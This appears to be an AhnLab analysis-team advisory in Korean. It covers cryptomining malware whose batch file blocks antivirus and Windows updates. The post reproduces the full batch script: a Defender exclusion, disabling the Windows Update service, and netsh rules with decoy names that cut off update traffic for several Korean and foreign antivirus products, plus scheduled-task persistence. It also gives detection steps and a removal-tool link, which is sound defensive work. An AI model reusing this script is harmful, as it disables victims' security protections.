암호화폐 채굴 목적의 악성코드에서 실행하는 배치파일(*.bat)에 의해 안랩의 V3 Lite와 Safe Transaction 제품 등 다양한 백신 제품들에 대한 업데이트를 무력화하는 형태가 확인되었다. 


배치파일의 내용은 다음과 같다. 'Windows Defender' 및 '윈도우 업데이트 서비스', '백신제품 업데이트 프로세스'를 방화벽 차단 리스트에 등록하여 업데이트를 무력화한다. (인바운드, 아웃바운드 모두 차단)


@echo off

powershell -Command "&Add-MpPreference -ExclusionPath ""%appdata%\Windows Defender"""

wscript.exe "%appdata%\Windows Defender\dwge0E7M515s6FzFXS8pkbX9I5M6Nv.vbs"

timeout /t 30

net stop wuauserv

sc config wuauserv start= disabled


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=in action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN1.0" dir=out action=block program="C:\Program Files\AhnLab\V3Lite30\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=in action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="OpenVPN2.0" dir=out action=block program="C:\Program Files\ESTsoft\ALYac\AYUpdSrv.aye"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=in action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Torrentservice" dir=out action=block program="C:\Program Files\Naver\NaverVaccine\NvcAgent.npc"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=in action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Msn Messenger" dir=out action=block program="C:\Program Files\AVAST Software\Avast\setup\instup.exe"


%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=in action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"

%WINDIR%\system32\netsh.exe advfirewall firewall add rule name="Skype updater" dir=out action=block program="C:\Program Files\AhnLab\Safe Transaction\MUpdate2\MUpdate2.exe"


%WINDIR%\system32\NetSh.exe Advfirewall set allprofiles state on

schtasks /create /xml "%appdata%\Windows Defender\7MV98fc27hVbvWmBM43veOE8Lk0uY2.xml" /tn "Windows Local Network Service"  


해당 배치파일 실행 시, V3Lite 제품의 경우 아래와 같이 업데이트 오류창이 발생한다. 정상적인 인터넷 사용이 가능한 환경에서 아래와 같은 창이 발생하면 해당 악성코드에 의한 방화벽 차단을 의심해볼 필요가 있다.




악성코드에 의해 방화벽 차단으로 등록되었는지 여부는 윈도우 버튼클릭 후 '프로그램 및 파일 검색'에서 "wf.msc"를 실행하여 보여지는 아래의 프로그램을 통해 확인할 수 있다. 배치파일에서 안랩 V3Lite와 Safe Transaction 제품과 관련해서는 각각 'OpenVPN1.0'과 'Skype updater' 이름으로 등록하였음으로 해당 항목의 값이 아래와 같이 인바운드, 아웃바운드 모두 차단된 것을 알 수 있다.





V3 제품에서는 이러한 행위 시도와 관련하여 아래와 같이 사전에 행위진단을 통해 방어하고 있다.



미 감염되어 이러한 증상이 확인된 경우에는 아래의 링크에서 제공하는 Ahnlab 전용백신(Registry Fix Tool)을 통해 방화벽 허용 조치 후, 백신을 업데이트 하면 된다.


전용백신 URL: https://www.ahnlab.com/kr/site/download/product/productVaccineList.do


이러한 악성코드에 대해 V3에서 다음과 같이 진단하고 있다.


- Trojan/Win32.Agent (2018.09.12.00)

- BAT/AVKill.S1 (2018.09.14.03)

- Malware/MDP.behavior.M2008



Posted by 분석팀